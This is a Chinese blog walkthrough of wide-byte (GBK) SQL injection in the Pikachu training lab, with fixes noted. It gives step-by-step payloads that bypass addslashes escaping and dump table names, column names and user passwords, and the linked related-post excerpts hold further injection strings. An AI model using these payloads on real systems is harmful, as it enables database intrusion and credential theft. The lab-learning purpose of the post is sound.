[Pikachu靶场实战系列] SQL注入(宽字节注入)

最新推荐文章于 2025-03-21 21:43:33 发布
最新推荐文章于 2025-03-21 21:43:33 发布
阅读量4.2k 收藏 29
点赞数 3
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45813980/article/details/119295166
版权

宽字节注入原理

在数据库中使用了宽字符集(GBK,GB2312等),除了英文都是一个字符占两字节;

MySQL在使用GBK编码的时候,会认为两个字符为一个汉字(ascii>128才能达到汉字范围);

在PHP中使用addslashes函数的时候,会对单引号%27进行转义,在前边加一个反斜杠”\”,变成%5c%27;

可以在前边添加%df,形成%df%5c%27,而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字;

%5c被吃掉了,单引号由此逃逸可以用来闭合语句。

使用PHP函数iconv(‘utf-8’,‘gbk’,$_GET[‘id’]),也可能导致注入产生

修复建议:

(1)使用mysqli_set_charset(GBK)指定字符集

(2)使用mysqli_real_escape_string进行转义

靶场实战

在这里插入图片描述
看一下提示
在这里插入图片描述

输入提示中的名字
在这里插入图片描述
构建pyload

name=kobe%df’ or 1=1#

单引号因为PHP中使用addslashes函数,被转义为\’,编码后就是%5c%27
加上pyload中的%df 后,就是 %df%5c%27 ,然后MySQL在使用GBK编码的时候,会认为两个字符为一个汉字, %df%5c就被解析为一个汉字,%27也就是单引号就成功逃逸了,成功实现闭合,后面就可以通过or 来执行语句了。
在这里插入图片描述
本来想判断一下是否有回显,然后用order by一直说用户名错误,看来应该不能用order by来判断,因为正常回显的情况下有用户id和email两项,我们直接用union select试一下

name=kobe%df’ union select 1,2#

在这里插入图片描述
有回显,那剩下的就是走流程了
查询数据库
在这里插入图片描述
查询表名

name=kobe%df’ union select 1,table_name from information_schema.tables where table_schema=‘pikachu’#

在这里插入图片描述
却发现没有查询成功,返回去看了一下,发现pyload里面有单引号,而在宽字节注入里面单引号是会被转义的,这里面的单引号也不能用之前的方法逃逸了,否则语句无法执行。

为了避免使用引号,采用嵌套查询

name=kobe%df’ union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#

在这里插入图片描述
查询users的列名

name=kobe%df’ union select (select group_concat(column_name) from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 3,1)),2#

在这里插入图片描述
查询password

name=kobe%df’ union select (select group_concat(username,0x3b,password) from users),2#

在这里插入图片描述

SQL注入进阶之1宽字节注入攻击(Pikachu漏洞练习平台)
ISNS的博客
02-29 4706
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 宽字节注入攻击可以说是SQL注入的进阶攻击方式,在我之前列出的学习计划体系中,前面的union联合查询注入攻击、布尔盲注、报错注入、时间盲注这几种常见的SQL注入方式,在我之前的博客中已经分析过了,那么今天在下面这些进阶的SQL注入方式中,要翻牌的就是宽字节注入。 原理讲解 接下来的讲解,将以问...
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4154
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu靶场sql注入)(宽字节注入和盲注)
weixin_54431413的博客
03-17 4201
一、宽字节注入 1.宽字节注入原理 宽字节注入有addslashes,mysql_real_escape_string,mysql_escape_string等转义的函数,对输入'进行了转义\' 在这个靶场是addslashes(),这个函数对这些进行了转义 单引号(') 双引号(") 反斜杠(\) NULL 但是在下方设置编码时设置为了gbk编码, 利用反斜杠编码为%5c,这里用%df构成(連)字绕过对 ' 的转义 2.首先利用burp抓包 然后用 1%df' union selec
SQL注入宽字节注入sql注入到getshell,sqlmap注入的使用)和XSS漏洞(存储型)实战练习(DVWA靶场
最新发布
m0_74292210的博客
03-21 628
因为网站会把用户输入的'前面加\进行处理,\会被编码为%5c,但是在查询中把%df和%5c通过GBK编码为汉字。在我们的请求里面,网站已经把我们输入的%编码为了%25,不能达到我们的目的,所以手动修改数据包。发现name做了长度限制,可以通过抓包或者改前端html来绕过。然后发现name做了<script>的替换,然后可以开始绕过。发现方法有效,该点存在宽字节注入漏洞,然后开始正式爆破。所以在'前加一个%df就可以把网站给我们加的\给绕过。过滤,绕不过去,只能从name注入。数据库名为pikachu
Pikachu靶场 宽字节SQL注入
感谢关注
12-25 758
时,会在前加一个反斜杠,会注释掉。一起被解码成一个汉字 “:上面说到,程序检测到。差不多,为什么不行?原因 :因为程序检测到。继续输入上面的代码,用。时,会在前加一个反斜杠。得到保留,所以注入成功。
Pikachu-Sql Inject-宽字节注入
guanrongl的专栏
10-04 807
宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为',其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义;GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。
pikachu宽字节注入
2301_79595769的博客
12-23 809
宽字节注入中有addslashe,mysql_real_escape_string,mysql_escape_string等转义函数,对输入'进行了转义\addslashe():函数返回在预定义字符之前添加反斜杠的字符串mysql_real_escape_string():函数转义sql语句中使用的字符串中的特殊字符mysql_escape_string():转义一个字符串利用反斜杠%5c和%df组成一个汉字宽字节get注入id=1%df’(浏览器自动进行url编码%27)->%df%27。
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 3637
pikachu靶场通关之sql注入
pikachu靶场-SQL-Inject
braty_的博客
02-23 1573
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu靶场闯关
m0_73872485的博客
07-29 1577
概念:前端在功能设计中将要操作的文件使用变量的方式传递给了后台,而又没有进行严格的安全考虑而造成的,攻击者可能会通过“../”(返回上级目录)这样的手段让后台打开或者执行一些其他的文件从而导致后台服务器上其他目录的文件结果被遍历出来,形成目录遍历漏洞。一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 对当前用户的权限进行校验,看其是否具备操作的权限,从而给出响应,而如果校验的规则过于简单则容易出现越权漏洞。-验证文件的上传方式;
pikachu靶场 SQL-inject
Al_1的博客
10-03 1124
数字型注入,字符型注入,搜索型注入,xx型注入,增改注入,删除注入,请求头注入,布尔盲注,时间盲注,宽字节盲注
Pikachu--宽字节注入--POST
weixin_70770389的博客
03-14 301
pikachu靶场宽字节注入,记录一下自己的作业步骤
pikachu之特殊注入之搜索型注入、xx型注入、insert/update注入、delete注入宽字节注入
2301_80661529的博客
03-02 1582
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节
pikachu靶场 宽字节注入 SQL注入学习记录
Nobody45678的博客
02-19 561
以下是摘抄的重点字符型的注入点我们都是用单引号来判断的,但是当遇到addslashes()时,单引号会被转义成 ’ ,导致我们用来判断注入点的单引号失效。所以我们的目的就是使转义符 \ 失效、使单引号逃逸。
SQL注入--宽字节注入
weixin_44940180的博客
08-04 819
什么是宽字节 当某字符的大小为一个字节时,称其字符为窄字节 当某字符的大小为两个字节时,称其字符为宽字节 所有英文默认占一个字节,汉字占两个字节 常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 使用宽字节注入的前提 数据库使用了gbk编码 使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes) 这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号
一文了解pikachuSQL注入
allintao的博客
03-01 3283
本文章主要讲解关于pikachu注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 5881
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
宽字节注入
土拨鼠挖洞中的博客
06-23 366
由于php中,转义函数的存在,导致在' 等字符前加转义字符\,即  \' 导致 ' 被转义,无法注入;但通过输入%df和函数执行添加的%5C,被合并成%df%5C。由于GBK是两字节,这个%df%5C被MYSQL识别为GBK。导致本应的%df\变成%df%5C。%df%5C在GBK编码中没有对应,所以被当成无效字符。 %DF’ :会被PHP当中的addslashes函数转义为“%DF\'”,“\”...
pikachu-SQL注入
qq_43660551的博客
05-11 2111
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
Pikachu靶场-SQL注入寻找注入类型
01-01
### Pikachu靶场中的SQL注入类型教程 #### 数字型SQL注入 当应用程序未正确过滤用户输入且该输入被用于构建SQL查询的一部分时,可能会发生数字型SQL注入。如果参数是整数形式,则攻击者可以尝试通过改变这个数值来观察应用行为的变化从而判断是否存在漏洞[^2]。 对于Pikachu靶场而言,在某些情况下,向URL或表单提交的数据中附加特殊字符(如`'`),会触发数据库错误提示,这表明可能存在SQL注入风险[^3]。 ```sql ?id=1 AND 1=1 -- 正常显示页面内容 ?id=1 AND 1=2 -- 页面返回异常或者空白页 ``` #### 字符型SQL注入 字符型SQL注入通常发生在字符串类型的参数上。在这种场景下,可以通过在合法数据之后追加恶意构造的SQL片段来进行测试。例如: ```sql username=admin' OR '1'='1 password=a' OR 'a'='a ``` 这些命令利用了逻辑运算符OR使得条件永远成立,进而绕过身份验证机制[^1]。 #### 联合查询注入 为了进一步探索数据库结构,即所谓的“爆库”,可以采用UNION SELECT语句组合两个SELECT查询的结果集。此方法适用于已知目标站点存在可利用的SQL注入点,并希望从中提取额外的信息的情况。比如获取其他表格的名字、列名等敏感资料。 ```sql ?search=test'+union+select+null,table_name,null+from+information_schema.tables--+HTTP/1.1 Host: example.com ``` 上述例子展示了如何从MySQL内置的信息模式(information_schema)读取有关现有表的信息。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值